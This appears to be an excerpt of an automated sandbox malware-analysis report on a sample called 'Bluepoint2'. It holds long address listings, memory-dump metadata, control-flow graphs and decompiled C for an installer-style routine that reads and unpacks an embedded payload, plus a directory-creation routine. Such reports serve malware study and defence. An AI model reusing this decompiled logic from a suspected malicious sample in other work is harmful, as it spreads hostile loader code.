                                                                                                                                    0x00406f35
                                                                                                                                    0x00406f33
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f75
                                                                                                                                    0x00406f75
                                                                                                                                    0x00406f79
                                                                                                                                    0x00407581
                                                                                                                                    0x00000000
                                                                                                                                    0x00407581
                                                                                                                                    0x00406f7f
                                                                                                                                    0x00406f82
                                                                                                                                    0x00406f85
                                                                                                                                    0x00406f89
                                                                                                                                    0x00406f8c
                                                                                                                                    0x00406f92
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f97
                                                                                                                                    0x00406f9a
                                                                                                                                    0x00406f9a
                                                                                                                                    0x00406fa0
                                                                                                                                    0x00406f3e
                                                                                                                                    0x00406f3e
                                                                                                                                    0x00406f41
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f41
                                                                                                                                    0x00406fa2
                                                                                                                                    0x00406fa2
                                                                                                                                    0x00406fa5
                                                                                                                                    0x00406fa8
                                                                                                                                    0x00406fab
                                                                                                                                    0x00406fae
                                                                                                                                    0x00406fb1
                                                                                                                                    0x00406fb4
                                                                                                                                    0x00406fb7
                                                                                                                                    0x00406fba
                                                                                                                                    0x00406fbd
                                                                                                                                    0x00406fc0
                                                                                                                                    0x00406fd8
                                                                                                                                    0x00406fdb
                                                                                                                                    0x00406fde
                                                                                                                                    0x00406fe1
                                                                                                                                    0x00406fe1
                                                                                                                                    0x00406fe4
                                                                                                                                    0x00406fe8
                                                                                                                                    0x00406fea
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fca
                                                                                                                                    0x00406fcf
                                                                                                                                    0x00406fd1
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406fed
                                                                                                                                    0x00406ff4
                                                                                                                                    0x00406ff7
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00000000
                                                                                                                                    0x00407286
                                                                                                                                    0x00407286
                                                                                                                                    0x0040728a
                                                                                                                                    0x004075b1
                                                                                                                                    0x00000000
                                                                                                                                    0x004075b1
                                                                                                                                    0x00407290
                                                                                                                                    0x00407293
                                                                                                                                    0x00407296
                                                                                                                                    0x0040729a
                                                                                                                                    0x0040729d
                                                                                                                                    0x004072a3
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407056
                                                                                                                                    0x00407056
                                                                                                                                    0x00407059
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407395
                                                                                                                                    0x00407399
                                                                                                                                    0x004073bb
                                                                                                                                    0x004073be
                                                                                                                                    0x004073c8
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x004073cb
                                                                                                                                    0x0040739b
                                                                                                                                    0x0040739e
                                                                                                                                    0x004073a2
                                                                                                                                    0x004073a5
                                                                                                                                    0x004073a5
                                                                                                                                    0x004073a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407452
                                                                                                                                    0x00407456
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x0040747b
                                                                                                                                    0x00407482
                                                                                                                                    0x00407489
                                                                                                                                    0x00407489
                                                                                                                                    0x00000000
                                                                                                                                    0x00407489
                                                                                                                                    0x00407458
                                                                                                                                    0x0040745b
                                                                                                                                    0x0040745e
                                                                                                                                    0x00407461
                                                                                                                                    0x00407468
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073af
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407543
                                                                                                                                    0x00407546
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040717d
                                                                                                                                    0x0040717f
                                                                                                                                    0x00407186
                                                                                                                                    0x00407187
                                                                                                                                    0x00407189
                                                                                                                                    0x0040718c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407194
                                                                                                                                    0x00407197
                                                                                                                                    0x0040719a
                                                                                                                                    0x0040719c
                                                                                                                                    0x0040719e
                                                                                                                                    0x0040719e
                                                                                                                                    0x0040719f
                                                                                                                                    0x004071a2
                                                                                                                                    0x004071a9
                                                                                                                                    0x004071ac
                                                                                                                                    0x004071ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407490
                                                                                                                                    0x00407490
                                                                                                                                    0x00407493
                                                                                                                                    0x0040749a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040749f
                                                                                                                                    0x0040749f
                                                                                                                                    0x004074a3
                                                                                                                                    0x004075db
                                                                                                                                    0x00000000
                                                                                                                                    0x004075db
                                                                                                                                    0x004074a9
                                                                                                                                    0x004074ac
                                                                                                                                    0x004074af
                                                                                                                                    0x004074b3
                                                                                                                                    0x004074b6
                                                                                                                                    0x004074bc
                                                                                                                                    0x004074be
                                                                                                                                    0x004074be
                                                                                                                                    0x004074be
                                                                                                                                    0x004074c1
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c7
                                                                                                                                    0x004074c7
                                                                                                                                    0x004074cb
                                                                                                                                    0x0040752b
                                                                                                                                    0x0040752e
                                                                                                                                    0x00407533
                                                                                                                                    0x00407534
                                                                                                                                    0x00407536
                                                                                                                                    0x00407538
                                                                                                                                    0x0040753b
                                                                                                                                    0x00407447
                                                                                                                                    0x00407447
                                                                                                                                    0x00000000
                                                                                                                                    0x00407447
                                                                                                                                    0x004074cd
                                                                                                                                    0x004074d3
                                                                                                                                    0x004074d6
                                                                                                                                    0x004074d9
                                                                                                                                    0x004074dc
                                                                                                                                    0x004074df
                                                                                                                                    0x004074e2
                                                                                                                                    0x004074e5
                                                                                                                                    0x004074e8
                                                                                                                                    0x004074eb
                                                                                                                                    0x004074ee
                                                                                                                                    0x00407507
                                                                                                                                    0x0040750a
                                                                                                                                    0x0040750d
                                                                                                                                    0x00407510
                                                                                                                                    0x00407514
                                                                                                                                    0x00407516
                                                                                                                                    0x00407516
                                                                                                                                    0x00407517
                                                                                                                                    0x0040751a
                                                                                                                                    0x004074f0
                                                                                                                                    0x004074f0
                                                                                                                                    0x004074f8
                                                                                                                                    0x004074fd
                                                                                                                                    0x004074ff
                                                                                                                                    0x00407502
                                                                                                                                    0x00407502
                                                                                                                                    0x0040751d
                                                                                                                                    0x00407524
                                                                                                                                    0x00000000
                                                                                                                                    0x00407526
                                                                                                                                    0x00000000
                                                                                                                                    0x00407526
                                                                                                                                    0x00000000
                                                                                                                                    0x004071c2
                                                                                                                                    0x004071c5
                                                                                                                                    0x004071fb
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732e
                                                                                                                                    0x0040732e
                                                                                                                                    0x00407331
                                                                                                                                    0x00407333
                                                                                                                                    0x004075bd
                                                                                                                                    0x00000000
                                                                                                                                    0x004075bd
                                                                                                                                    0x00407339
                                                                                                                                    0x0040733c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407342
                                                                                                                                    0x00407346
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00000000
                                                                                                                                    0x00407349
                                                                                                                                    0x004071c7
                                                                                                                                    0x004071c9
                                                                                                                                    0x004071cb
                                                                                                                                    0x004071cd
                                                                                                                                    0x004071d0
                                                                                                                                    0x004071d1
                                                                                                                                    0x004071d3
                                                                                                                                    0x004071d5
                                                                                                                                    0x004071d8
                                                                                                                                    0x004071db
                                                                                                                                    0x004071f1
                                                                                                                                    0x004071f6
                                                                                                                                    0x0040722e
                                                                                                                                    0x0040722e
                                                                                                                                    0x00407232
                                                                                                                                    0x0040725e
                                                                                                                                    0x00407260
                                                                                                                                    0x00407267
                                                                                                                                    0x0040726a
                                                                                                                                    0x0040726d
                                                                                                                                    0x0040726d
                                                                                                                                    0x00407272
                                                                                                                                    0x00407272
                                                                                                                                    0x00407274
                                                                                                                                    0x00407277
                                                                                                                                    0x0040727e
                                                                                                                                    0x00407281
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072b1
                                                                                                                                    0x004072b4
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00000000
                                                                                                                                    0x00407328
                                                                                                                                    0x004072b6
                                                                                                                                    0x004072bc
                                                                                                                                    0x004072bf
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072c5
                                                                                                                                    0x004072c8
                                                                                                                                    0x004072cb
                                                                                                                                    0x004072ce
                                                                                                                                    0x004072d1
                                                                                                                                    0x004072d4
                                                                                                                                    0x004072d7
                                                                                                                                    0x004072f0
                                                                                                                                    0x004072f2
                                                                                                                                    0x004072f5
                                                                                                                                    0x004072f6
                                                                                                                                    0x004072f9
                                                                                                                                    0x004072fb
                                                                                                                                    0x004072fe
                                                                                                                                    0x00407300
                                                                                                                                    0x00407302
                                                                                                                                    0x00407305
                                                                                                                                    0x00407307
                                                                                                                                    0x0040730a
                                                                                                                                    0x0040730e
                                                                                                                                    0x00407310
                                                                                                                                    0x00407310
                                                                                                                                    0x00407311
                                                                                                                                    0x00407314
                                                                                                                                    0x00407317
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072e1
                                                                                                                                    0x004072e6
                                                                                                                                    0x004072e8
                                                                                                                                    0x004072eb
                                                                                                                                    0x004072eb
                                                                                                                                    0x0040731a
                                                                                                                                    0x00407321
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00407321
                                                                                                                                    0x00407234
                                                                                                                                    0x00407237
                                                                                                                                    0x00407239
                                                                                                                                    0x0040723c
                                                                                                                                    0x0040723f
                                                                                                                                    0x00407242
                                                                                                                                    0x00407244
                                                                                                                                    0x00407247
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724d
                                                                                                                                    0x0040724d
                                                                                                                                    0x00407250
                                                                                                                                    0x00407257
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00407257
                                                                                                                                    0x004071dd
                                                                                                                                    0x004071e0
                                                                                                                                    0x004071e2
                                                                                                                                    0x004071e5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f48
                                                                                                                                    0x0040758d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040758d
                                                                                                                                    0x00406f4e
                                                                                                                                    0x00406f51
                                                                                                                                    0x00406f54
                                                                                                                                    0x00406f57
                                                                                                                                    0x00406f5a
                                                                                                                                    0x00406f5d
                                                                                                                                    0x00406f60
                                                                                                                                    0x00406f62
                                                                                                                                    0x00406f65
                                                                                                                                    0x00406f68
                                                                                                                                    0x00406f6b
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070d3
                                                                                                                                    0x00407599
                                                                                                                                    0x00000000
                                                                                                                                    0x00407599
                                                                                                                                    0x004070d9
                                                                                                                                    0x004070dc
                                                                                                                                    0x004070df
                                                                                                                                    0x004070e2
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e7
                                                                                                                                    0x004070ea
                                                                                                                                    0x004070ed
                                                                                                                                    0x004070f0
                                                                                                                                    0x004070f3
                                                                                                                                    0x004070f6
                                                                                                                                    0x004070f7
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070fc
                                                                                                                                    0x004070ff
                                                                                                                                    0x00407102
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407108
                                                                                                                                    0x0040710a
                                                                                                                                    0x0040710a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x00407350
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407356
                                                                                                                                    0x00407359
                                                                                                                                    0x0040735c
                                                                                                                                    0x0040735f
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407364
                                                                                                                                    0x00407367
                                                                                                                                    0x0040736a
                                                                                                                                    0x0040736d
                                                                                                                                    0x00407370
                                                                                                                                    0x00407373
                                                                                                                                    0x00407374
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407379
                                                                                                                                    0x0040737c
                                                                                                                                    0x0040737f
                                                                                                                                    0x00407382
                                                                                                                                    0x00407385
                                                                                                                                    0x00407389
                                                                                                                                    0x0040738b
                                                                                                                                    0x0040738e
                                                                                                                                    0x00000000
                                                                                                                                    0x00407390
                                                                                                                                    0x0040710d
                                                                                                                                    0x0040710d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040710d
                                                                                                                                    0x0040738e
                                                                                                                                    0x004075c3
                                                                                                                                    0x004075e5
                                                                                                                                    0x004075eb
                                                                                                                                    0x004075ed
                                                                                                                                    0x004075f4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406bf2
                                                                                                                                    0x004075fa
                                                                                                                                    0x004075fa
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    • <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"> <g fill="#2e3436"> <path d="m 164,249 v 1.5 4.5 h 3 v -4.5 -1.5 z m -4,3 v 1.5 1.5 h 3 v -1.5 -1.5 z m -8,8 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1., xrefs: 00406BBA
                                                                                                                                    • font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:norma, xrefs: 00406BB0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"> <g fill="#2e3436"> <path d="m 164,249 v 1.5 4.5 h 3 v -4.5 -1.5 z m -4,3 v 1.5 1.5 h 3 v -1.5 -1.5 z m -8,8 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.$font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:norma
                                                                                                                                    • API String ID: 0-546649030
                                                                                                                                    • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                                                                    • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                                                                    • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                                                                    • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00403479 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 918 403479-4034a1 GetTickCount 919 4035d1-4035d9 call 40302e 918->919 920 4034a7-4034d2 call 4035f8 SetFilePointer 918->920 925 4035db-4035df 919->925 926 4034d7-4034e9 920->926 927 4034eb 926->927 928 4034ed-4034fb call 4035e2 926->928 927->928 931 403501-40350d 928->931 932 4035c3-4035c6 928->932 933 403513-403519 931->933 932->925 934 403544-403560 call 406bb0 933->934 935 40351b-403521 933->935 941 403562-40356a 934->941 942 4035cc 934->942 935->934 936 403523-403543 call 40302e 935->936 936->934 943 40356c-403574 call 40620a 941->943 944 40358d-403593 941->944 945 4035ce-4035cf 942->945 948 403579-40357b 943->948 944->942 947 403595-403597 944->947 945->925 947->942 949 403599-4035ac 947->949 950 4035c8-4035ca 948->950 951 40357d-403589 948->951 949->926 952 4035b2-4035c1 SetFilePointer 949->952 950->945 951->933 953 40358b 951->953 952->919 953->949
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E00403479(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x420ef4; // 0x5afdd
				_t34 = _t32 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t10 =  *0x420ef8; // 0x2bbad
					_t31 = 0x4000;
					_t11 = _t10 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						_t19 =  *0x420f00; // 0x230a5
						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40d152
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4; // 0x5afdd
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















                                                                                                                                    0x0040347c
                                                                                                                                    0x00403489
                                                                                                                                    0x0040349c
                                                                                                                                    0x004034a1
                                                                                                                                    0x004035d1
                                                                                                                                    0x004035d3
                                                                                                                                    0x00000000
                                                                                                                                    0x004035d9
                                                                                                                                    0x004034ad
                                                                                                                                    0x004034c0
                                                                                                                                    0x004034c6
                                                                                                                                    0x004034cc
                                                                                                                                    0x004034d7
                                                                                                                                    0x004034d7
                                                                                                                                    0x004034dc
                                                                                                                                    0x004034e1
                                                                                                                                    0x004034e9
                                                                                                                                    0x004034eb
                                                                                                                                    0x004034eb
                                                                                                                                    0x004034f4
                                                                                                                                    0x004034fb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403501
                                                                                                                                    0x00403507
                                                                                                                                    0x0040350d
                                                                                                                                    0x00000000
                                                                                                                                    0x00403513
                                                                                                                                    0x00403519
                                                                                                                                    0x00403523
                                                                                                                                    0x00403539
                                                                                                                                    0x0040353e
                                                                                                                                    0x00403543
                                                                                                                                    0x00403549
                                                                                                                                    0x0040354f
                                                                                                                                    0x00403559
                                                                                                                                    0x00403560
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403562
                                                                                                                                    0x00403568
                                                                                                                                    0x0040356a
                                                                                                                                    0x0040358d
                                                                                                                                    0x00403593
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403595
                                                                                                                                    0x00403597
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403599
                                                                                                                                    0x00403599
                                                                                                                                    0x004035ac
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004035bb
                                                                                                                                    0x00000000
                                                                                                                                    0x004035bb
                                                                                                                                    0x00403574
                                                                                                                                    0x0040357b
                                                                                                                                    0x004035c8
                                                                                                                                    0x004035ce
                                                                                                                                    0x004035ce
                                                                                                                                    0x00000000
                                                                                                                                    0x004035ce
                                                                                                                                    0x0040357d
                                                                                                                                    0x00403583
                                                                                                                                    0x00403589
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004035cc
                                                                                                                                    0x004035cc
                                                                                                                                    0x00000000
                                                                                                                                    0x004035cc
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040348D
                                                                                                                                      • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                                                                    • SetFilePointer.KERNELBASE(0005AFDD,00000000,00000000,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"> <g fill="#2e3436"> <path d="m 164,249 v 1.5 4.5 h 3 v -4.5 -1.5 z m -4,3 v 1.5 1.5 h 3 v -1.5 -1.5 z m -8,8 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                                                                    Strings
                                                                                                                                    • <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"> <g fill="#2e3436"> <path d="m 164,249 v 1.5 4.5 h 3 v -4.5 -1.5 z m -4,3 v 1.5 1.5 h 3 v -1.5 -1.5 z m -8,8 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1., xrefs: 004034ED, 004034F3
                                                                                                                                    • font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:norma, xrefs: 004034D2, 0040356D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer$CountTick
                                                                                                                                    • String ID: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"> <g fill="#2e3436"> <path d="m 164,249 v 1.5 4.5 h 3 v -4.5 -1.5 z m -4,3 v 1.5 1.5 h 3 v -1.5 -1.5 z m -8,8 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.$font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:norma
                                                                                                                                    • API String ID: 1092082344-546649030
                                                                                                                                    • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                                                                    • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                                                                    • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                                                                    • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 954 405b99-405be4 CreateDirectoryW 955 405be6-405be8 954->955 956 405bea-405bf7 GetLastError 954->956 957 405c11-405c13 955->957 956->957 958 405bf9-405c0d SetFileSecurityW 956->958 958->955 959 405c0f GetLastError 958->959 959->957
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                                                    0x00405ba4
                                                                                                                                    0x00405ba8
                                                                                                                                    0x00405bab
                                                                                                                                    0x00405bb1
                                                                                                                                    0x00405bb5
                                                                                                                                    0x00405bb9
                                                                                                                                    0x00405bc1
